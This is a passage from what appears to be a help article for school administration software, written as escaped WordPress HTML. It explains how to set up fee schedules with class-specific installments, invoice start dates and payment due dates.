Quarter 1, Term1, Ist Installment. You can configure start &amp; due dates along with pro-rata fee installments. This allows you to configure multiple installments for same or different-2 classes. <\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>How to create Fee Schedule?<\/strong><\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Navigate to <strong>Settings &gt; Finance &gt; Fee &gt; Fee Schedule<\/strong>.<\/li>\n\n\n\n<li>Click the <strong>Add (+)<\/strong> button to open the schedule creation page.<\/li>\n\n\n\n<li><strong>Defining Fee Schedule Details<\/strong>\n<ul class=\"wp-block-list\">\n<li><strong>Schedule Name<\/strong>: Provide a clear name to schedule to identify (e.g., &#8220;Monthly, Quartely, Half Yearly etc.)<\/li>\n\n\n\n<li><strong>Applicable Class<\/strong>: Select the class or classes to which this schedule applies.<\/li>\n\n\n\n<li><strong>Installments<\/strong>: Specify the number of installments for the fee schedule, this should be as per the schedule name you have given.<\/li>\n\n\n\n<li><strong>Installment Name<\/strong>: Specify the installment name (e.g., &#8220;April, May, Quarter 1 or 2 etc.&#8221;).<\/li>\n\n\n\n<li><strong>Start Date<\/strong>: On this date invoice will be generated and posted as due in student ledger(Due gets created).<\/li>\n\n\n\n<li><strong>End Date<\/strong>: This date will serve as payment due date, Parents should clear the payments before it.
